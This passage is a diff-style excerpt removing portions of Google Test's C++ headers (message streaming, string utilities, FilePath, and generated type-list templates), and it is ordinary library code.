-    *ss_ << val;
-    return *this;
-  }
-
-  // Instead of 1/0, we want to see true/false for bool values.
-  Message& operator <<(bool b) {
-    return *this << (b ? "true" : "false");
-  }
-
-  // These two overloads allow streaming a wide C string to a Message
-  // using the UTF-8 encoding.
-  Message& operator <<(const wchar_t* wide_c_str);
-  Message& operator <<(wchar_t* wide_c_str);
-
-#if GTEST_HAS_STD_WSTRING
-  // Converts the given wide string to a narrow string using the UTF-8
-  // encoding, and streams the result to this Message object.
-  Message& operator <<(const ::std::wstring& wstr);
-#endif  // GTEST_HAS_STD_WSTRING
-
-#if GTEST_HAS_GLOBAL_WSTRING
-  // Converts the given wide string to a narrow string using the UTF-8
-  // encoding, and streams the result to this Message object.
-  Message& operator <<(const ::wstring& wstr);
-#endif  // GTEST_HAS_GLOBAL_WSTRING
-
-  // Gets the text streamed to this object so far as an std::string.
-  // Each '\0' character in the buffer is replaced with "\\0".
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  std::string GetString() const;
-
- private:
-
-#if GTEST_OS_SYMBIAN
-  // These are needed as the Nokia Symbian Compiler cannot decide between
-  // const T& and const T* in a function template. The Nokia compiler _can_
-  // decide between class template specializations for T and T*, so a
-  // tr1::type_traits-like is_pointer works, and we can overload on that.
-  template <typename T>
-  inline void StreamHelper(internal::true_type /*is_pointer*/, T* pointer) {
-    if (pointer == NULL) {
-      *ss_ << "(null)";
-    } else {
-      *ss_ << pointer;
-    }
-  }
-  template <typename T>
-  inline void StreamHelper(internal::false_type /*is_pointer*/,
-                           const T& value) {
-    // See the comments in Message& operator <<(const T&) above for why
-    // we need this using statement.
-    using ::operator <<;
-    *ss_ << value;
-  }
-#endif  // GTEST_OS_SYMBIAN
-
-  // We'll hold the text streamed to this object here.
-  const internal::scoped_ptr< ::std::stringstream> ss_;
-
-  // We declare (but don't implement) this to prevent the compiler
-  // from implementing the assignment operator.
-  void operator=(const Message&);
-};
-
-// Streams a Message to an ostream.
-inline std::ostream& operator <<(std::ostream& os, const Message& sb) {
-  return os << sb.GetString();
-}
-
-namespace internal {
-
-// Converts a streamable value to an std::string.  A NULL pointer is
-// converted to "(null)".  When the input value is a ::string,
-// ::std::string, ::wstring, or ::std::wstring object, each NUL
-// character in it is replaced with "\\0".
-template <typename T>
-std::string StreamableToString(const T& streamable) {
-  return (Message() << streamable).GetString();
-}
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_GTEST_MESSAGE_H_
-// Copyright 2005, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Authors: wan@google.com (Zhanyong Wan), eefacm@gmail.com (Sean Mcafee)
-//
-// The Google C++ Testing Framework (Google Test)
-//
-// This header file declares the String class and functions used internally by
-// Google Test.  They are subject to change without notice. They should not used
-// by code external to Google Test.
-//
-// This header file is #included by <gtest/internal/gtest-internal.h>.
-// It should not be #included by other files.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-
-#ifdef __BORLANDC__
-// string.h is not guaranteed to provide strcpy on C++ Builder.
-# include <mem.h>
-#endif
-
-#include <string.h>
-#include <string>
-
-
-namespace testing {
-namespace internal {
-
-// String - an abstract class holding static string utilities.
-class GTEST_API_ String {
- public:
-  // Static utility methods
-
-  // Clones a 0-terminated C string, allocating memory using new.  The
-  // caller is responsible for deleting the return value using
-  // delete[].  Returns the cloned string, or NULL if the input is
-  // NULL.
-  //
-  // This is different from strdup() in string.h, which allocates
-  // memory using malloc().
-  static const char* CloneCString(const char* c_str);
-
-#if GTEST_OS_WINDOWS_MOBILE
-  // Windows CE does not have the 'ANSI' versions of Win32 APIs. To be
-  // able to pass strings to Win32 APIs on CE we need to convert them
-  // to 'Unicode', UTF-16.
-
-  // Creates a UTF-16 wide string from the given ANSI string, allocating
-  // memory using new. The caller is responsible for deleting the return
-  // value using delete[]. Returns the wide string, or NULL if the
-  // input is NULL.
-  //
-  // The wide string is created using the ANSI codepage (CP_ACP) to
-  // match the behaviour of the ANSI versions of Win32 calls and the
-  // C runtime.
-  static LPCWSTR AnsiToUtf16(const char* c_str);
-
-  // Creates an ANSI string from the given wide string, allocating
-  // memory using new. The caller is responsible for deleting the return
-  // value using delete[]. Returns the ANSI string, or NULL if the
-  // input is NULL.
-  //
-  // The returned string is created using the ANSI codepage (CP_ACP) to
-  // match the behaviour of the ANSI versions of Win32 calls and the
-  // C runtime.
-  static const char* Utf16ToAnsi(LPCWSTR utf16_str);
-#endif
-
-  // Compares two C strings.  Returns true iff they have the same content.
-  //
-  // Unlike strcmp(), this function can handle NULL argument(s).  A
-  // NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool CStringEquals(const char* lhs, const char* rhs);
-
-  // Converts a wide C string to a String using the UTF-8 encoding.
-  // NULL will be converted to "(null)".  If an error occurred during
-  // the conversion, "(failed to convert from wide string)" is
-  // returned.
-  static std::string ShowWideCString(const wchar_t* wide_c_str);
-
-  // Compares two wide C strings.  Returns true iff they have the same
-  // content.
-  //
-  // Unlike wcscmp(), this function can handle NULL argument(s).  A
-  // NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool WideCStringEquals(const wchar_t* lhs, const wchar_t* rhs);
-
-  // Compares two C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike strcasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL C string,
-  // including the empty string.
-  static bool CaseInsensitiveCStringEquals(const char* lhs,
-                                           const char* rhs);
-
-  // Compares two wide C strings, ignoring case.  Returns true iff they
-  // have the same content.
-  //
-  // Unlike wcscasecmp(), this function can handle NULL argument(s).
-  // A NULL C string is considered different to any non-NULL wide C string,
-  // including the empty string.
-  // NB: The implementations on different platforms slightly differ.
-  // On windows, this method uses _wcsicmp which compares according to LC_CTYPE
-  // environment variable. On GNU platform this method uses wcscasecmp
-  // which compares according to LC_CTYPE category of the current locale.
-  // On MacOS X, it uses towlower, which also uses LC_CTYPE category of the
-  // current locale.
-  static bool CaseInsensitiveWideCStringEquals(const wchar_t* lhs,
-                                               const wchar_t* rhs);
-
-  // Returns true iff the given string ends with the given suffix, ignoring
-  // case. Any string is considered to end with an empty suffix.
-  static bool EndsWithCaseInsensitive(
-      const std::string& str, const std::string& suffix);
-
-  // Formats an int value as "%02d".
-  static std::string FormatIntWidth2(int value);  // "%02d" for width == 2
-
-  // Formats an int value as "%X".
-  static std::string FormatHexInt(int value);
-
-  // Formats a byte as "%02X".
-  static std::string FormatByte(unsigned char value);
-
- private:
-  String();  // Not meant to be instantiated.
-};  // class String
-
-// Gets the content of the stringstream's buffer as an std::string.  Each '\0'
-// character in the buffer is replaced with "\\0".
-GTEST_API_ std::string StringStreamToString(::std::stringstream* stream);
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_STRING_H_
-// Copyright 2008, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: keith.ray@gmail.com (Keith Ray)
-//
-// Google Test filepath utilities
-//
-// This header file declares classes and functions used internally by
-// Google Test.  They are subject to change without notice.
-//
-// This file is #included in <gtest/internal/gtest-internal.h>.
-// Do not include this header file separately!
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-
-
-namespace testing {
-namespace internal {
-
-// FilePath - a class for file and directory pathname manipulation which
-// handles platform-specific conventions (like the pathname separator).
-// Used for helper functions for naming files in a directory for xml output.
-// Except for Set methods, all methods are const or static, which provides an
-// "immutable value object" -- useful for peace of mind.
-// A FilePath with a value ending in a path separator ("like/this/") represents
-// a directory, otherwise it is assumed to represent a file. In either case,
-// it may or may not represent an actual file or directory in the file system.
-// Names are NOT checked for syntax correctness -- no checking for illegal
-// characters, malformed paths, etc.
-
-class GTEST_API_ FilePath {
- public:
-  FilePath() : pathname_("") { }
-  FilePath(const FilePath& rhs) : pathname_(rhs.pathname_) { }
-
-  explicit FilePath(const std::string& pathname) : pathname_(pathname) {
-    Normalize();
-  }
-
-  FilePath& operator=(const FilePath& rhs) {
-    Set(rhs);
-    return *this;
-  }
-
-  void Set(const FilePath& rhs) {
-    pathname_ = rhs.pathname_;
-  }
-
-  const std::string& string() const { return pathname_; }
-  const char* c_str() const { return pathname_.c_str(); }
-
-  // Returns the current working directory, or "" if unsuccessful.
-  static FilePath GetCurrentDir();
-
-  // Given directory = "dir", base_name = "test", number = 0,
-  // extension = "xml", returns "dir/test.xml". If number is greater
-  // than zero (e.g., 12), returns "dir/test_12.xml".
-  // On Windows platform, uses \ as the separator rather than /.
-  static FilePath MakeFileName(const FilePath& directory,
-                               const FilePath& base_name,
-                               int number,
-                               const char* extension);
-
-  // Given directory = "dir", relative_path = "test.xml",
-  // returns "dir/test.xml".
-  // On Windows, uses \ as the separator rather than /.
-  static FilePath ConcatPaths(const FilePath& directory,
-                              const FilePath& relative_path);
-
-  // Returns a pathname for a file that does not currently exist. The pathname
-  // will be directory/base_name.extension or
-  // directory/base_name_<number>.extension if directory/base_name.extension
-  // already exists. The number will be incremented until a pathname is found
-  // that does not already exist.
-  // Examples: 'dir/foo_test.xml' or 'dir/foo_test_1.xml'.
-  // There could be a race condition if two or more processes are calling this
-  // function at the same time -- they could both pick the same filename.
-  static FilePath GenerateUniqueFileName(const FilePath& directory,
-                                         const FilePath& base_name,
-                                         const char* extension);
-
-  // Returns true iff the path is "".
-  bool IsEmpty() const { return pathname_.empty(); }
-
-  // If input name has a trailing separator character, removes it and returns
-  // the name, otherwise return the name string unmodified.
-  // On Windows platform, uses \ as the separator, other platforms use /.
-  FilePath RemoveTrailingPathSeparator() const;
-
-  // Returns a copy of the FilePath with the directory part removed.
-  // Example: FilePath("path/to/file").RemoveDirectoryName() returns
-  // FilePath("file"). If there is no directory part ("just_a_file"), it returns
-  // the FilePath unmodified. If there is no file part ("just_a_dir/") it
-  // returns an empty FilePath ("").
-  // On Windows platform, '\' is the path separator, otherwise it is '/'.
-  FilePath RemoveDirectoryName() const;
-
-  // RemoveFileName returns the directory path with the filename removed.
-  // Example: FilePath("path/to/file").RemoveFileName() returns "path/to/".
-  // If the FilePath is "a_file" or "/a_file", RemoveFileName returns
-  // FilePath("./") or, on Windows, FilePath(".\\"). If the filepath does
-  // not have a file, like "just/a/dir/", it returns the FilePath unmodified.
-  // On Windows platform, '\' is the path separator, otherwise it is '/'.
-  FilePath RemoveFileName() const;
-
-  // Returns a copy of the FilePath with the case-insensitive extension removed.
-  // Example: FilePath("dir/file.exe").RemoveExtension("EXE") returns
-  // FilePath("dir/file"). If a case-insensitive extension is not
-  // found, returns a copy of the original FilePath.
-  FilePath RemoveExtension(const char* extension) const;
-
-  // Creates directories so that path exists. Returns true if successful or if
-  // the directories already exist; returns false if unable to create
-  // directories for any reason. Will also return false if the FilePath does
-  // not represent a directory (that is, it doesn't end with a path separator).
-  bool CreateDirectoriesRecursively() const;
-
-  // Create the directory so that path exists. Returns true if successful or
-  // if the directory already exists; returns false if unable to create the
-  // directory for any reason, including if the parent directory does not
-  // exist. Not named "CreateDirectory" because that's a macro on Windows.
-  bool CreateFolder() const;
-
-  // Returns true if FilePath describes something in the file-system,
-  // either a file, directory, or whatever, and that something exists.
-  bool FileOrDirectoryExists() const;
-
-  // Returns true if pathname describes a directory in the file-system
-  // that exists.
-  bool DirectoryExists() const;
-
-  // Returns true if FilePath ends with a path separator, which indicates that
-  // it is intended to represent a directory. Returns false otherwise.
-  // This does NOT check that a directory (or file) actually exists.
-  bool IsDirectory() const;
-
-  // Returns true if pathname describes a root directory. (Windows has one
-  // root directory per disk drive.)
-  bool IsRootDirectory() const;
-
-  // Returns true if pathname describes an absolute path.
-  bool IsAbsolutePath() const;
-
- private:
-  // Replaces multiple consecutive separators with a single separator.
-  // For example, "bar///foo" becomes "bar/foo". Does not eliminate other
-  // redundancies that might be in a pathname involving "." or "..".
-  //
-  // A pathname with multiple consecutive separators may occur either through
-  // user error or as a result of some scripts or APIs that generate a pathname
-  // with a trailing separator. On other platforms the same API or script
-  // may NOT generate a pathname with a trailing "/". Then elsewhere that
-  // pathname may have another "/" and pathname components added to it,
-  // without checking for the separator already being there.
-  // The script language and operating system may allow paths like "foo//bar"
-  // but some of the functions in FilePath will not handle that correctly. In
-  // particular, RemoveTrailingPathSeparator() only removes one separator, and
-  // it is called in CreateDirectoriesRecursively() assuming that it will change
-  // a pathname from directory syntax (trailing separator) to filename syntax.
-  //
-  // On Windows this method also replaces the alternate path separator '/' with
-  // the primary path separator '\\', so that for example "bar\\/\\foo" becomes
-  // "bar\\foo".
-
-  void Normalize();
-
-  // Returns a pointer to the last occurence of a valid path separator in
-  // the FilePath. On Windows, for example, both '/' and '\' are valid path
-  // separators. Returns NULL if no path separator was found.
-  const char* FindLastPathSeparator() const;
-
-  std::string pathname_;
-};  // class FilePath
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_FILEPATH_H_
-// This file was GENERATED by command:
-//     pump.py gtest-type-util.h.pump
-// DO NOT EDIT BY HAND!!!
-
-// Copyright 2008 Google Inc.
-// All Rights Reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-//
-// Author: wan@google.com (Zhanyong Wan)
-
-// Type utilities needed for implementing typed and type-parameterized
-// tests.  This file is generated by a SCRIPT.  DO NOT EDIT BY HAND!
-//
-// Currently we support at most 50 types in a list, and at most 50
-// type-parameterized tests in one type-parameterized test case.
-// Please contact googletestframework@googlegroups.com if you need
-// more.
-
-#ifndef GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-#define GTEST_INCLUDE_GTEST_INTERNAL_GTEST_TYPE_UTIL_H_
-
-
-// #ifdef __GNUC__ is too general here.  It is possible to use gcc without using
-// libstdc++ (which is where cxxabi.h comes from).
-# if GTEST_HAS_CXXABI_H_
-#  include <cxxabi.h>
-# elif defined(__HP_aCC)
-#  include <acxx_demangle.h>
-# endif  // GTEST_HASH_CXXABI_H_
-
-namespace testing {
-namespace internal {
-
-// GetTypeName<T>() returns a human-readable name of type T.
-// NB: This function is also used in Google Mock, so don't move it inside of
-// the typed-test-only section below.
-template <typename T>
-std::string GetTypeName() {
-# if GTEST_HAS_RTTI
-
-  const char* const name = typeid(T).name();
-#  if GTEST_HAS_CXXABI_H_ || defined(__HP_aCC)
-  int status = 0;
-  // gcc's implementation of typeid(T).name() mangles the type name,
-  // so we have to demangle it.
-#   if GTEST_HAS_CXXABI_H_
-  using abi::__cxa_demangle;
-#   endif  // GTEST_HAS_CXXABI_H_
-  char* const readable_name = __cxa_demangle(name, 0, 0, &status);
-  const std::string name_str(status == 0 ? readable_name : name);
-  free(readable_name);
-  return name_str;
-#  else
-  return name;
-#  endif  // GTEST_HAS_CXXABI_H_ || __HP_aCC
-
-# else
-
-  return "<type>";
-
-# endif  // GTEST_HAS_RTTI
-}
-
-#if GTEST_HAS_TYPED_TEST || GTEST_HAS_TYPED_TEST_P
-
-// AssertyTypeEq<T1, T2>::type is defined iff T1 and T2 are the same
-// type.  This can be used as a compile-time assertion to ensure that
-// two types are equal.
-
-template <typename T1, typename T2>
-struct AssertTypeEq;
-
-template <typename T>
-struct AssertTypeEq<T, T> {
-  typedef bool type;
-};
-
-// A unique type used as the default value for the arguments of class
-// template Types.  This allows us to simulate variadic templates
-// (e.g. Types<int>, Type<int, double>, and etc), which C++ doesn't
-// support directly.
-struct None {};
-
-// The following family of struct and struct templates are used to
-// represent type lists.  In particular, TypesN<T1, T2, ..., TN>
-// represents a type list with N types (T1, T2, ..., and TN) in it.
-// Except for Types0, every struct in the family has two member types:
-// Head for the first type in the list, and Tail for the rest of the
-// list.
-
-// The empty type list.
-struct Types0 {};
-
-// Type lists of length 1, 2, 3, and so on.
-
-template <typename T1>
-struct Types1 {
-  typedef T1 Head;
-  typedef Types0 Tail;
-};
-template <typename T1, typename T2>
-struct Types2 {
-  typedef T1 Head;
-  typedef Types1<T2> Tail;
-};
-
-template <typename T1, typename T2, typename T3>
-struct Types3 {
-  typedef T1 Head;
-  typedef Types2<T2, T3> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4>
-struct Types4 {
-  typedef T1 Head;
-  typedef Types3<T2, T3, T4> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-struct Types5 {
-  typedef T1 Head;
-  typedef Types4<T2, T3, T4, T5> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-struct Types6 {
-  typedef T1 Head;
-  typedef Types5<T2, T3, T4, T5, T6> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-struct Types7 {
-  typedef T1 Head;
-  typedef Types6<T2, T3, T4, T5, T6, T7> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-struct Types8 {
-  typedef T1 Head;
-  typedef Types7<T2, T3, T4, T5, T6, T7, T8> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-struct Types9 {
-  typedef T1 Head;
-  typedef Types8<T2, T3, T4, T5, T6, T7, T8, T9> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-struct Types10 {
-  typedef T1 Head;
-  typedef Types9<T2, T3, T4, T5, T6, T7, T8, T9, T10> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-struct Types11 {
-  typedef T1 Head;
-  typedef Types10<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-struct Types12 {
-  typedef T1 Head;
-  typedef Types11<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-struct Types13 {
-  typedef T1 Head;
-  typedef Types12<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14>
-struct Types14 {
-  typedef T1 Head;
-  typedef Types13<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15>
-struct Types15 {
-  typedef T1 Head;
-  typedef Types14<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-struct Types16 {
-  typedef T1 Head;
-  typedef Types15<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-struct Types17 {
-  typedef T1 Head;
-  typedef Types16<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-struct Types18 {
-  typedef T1 Head;
-  typedef Types17<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-struct Types19 {
-  typedef T1 Head;
-  typedef Types18<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-struct Types20 {
-  typedef T1 Head;
-  typedef Types19<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-struct Types21 {
-  typedef T1 Head;
-  typedef Types20<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-struct Types22 {
-  typedef T1 Head;
-  typedef Types21<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-struct Types23 {
-  typedef T1 Head;
-  typedef Types22<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-struct Types24 {
-  typedef T1 Head;
-  typedef Types23<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-struct Types25 {
-  typedef T1 Head;
-  typedef Types24<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-struct Types26 {
-  typedef T1 Head;
-  typedef Types25<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-struct Types27 {
-  typedef T1 Head;
-  typedef Types26<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27> Tail;
-};
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-struct Types28 {
-  typedef T1 Head;
-  typedef Types27<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-      T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28> Tail;
-};
-
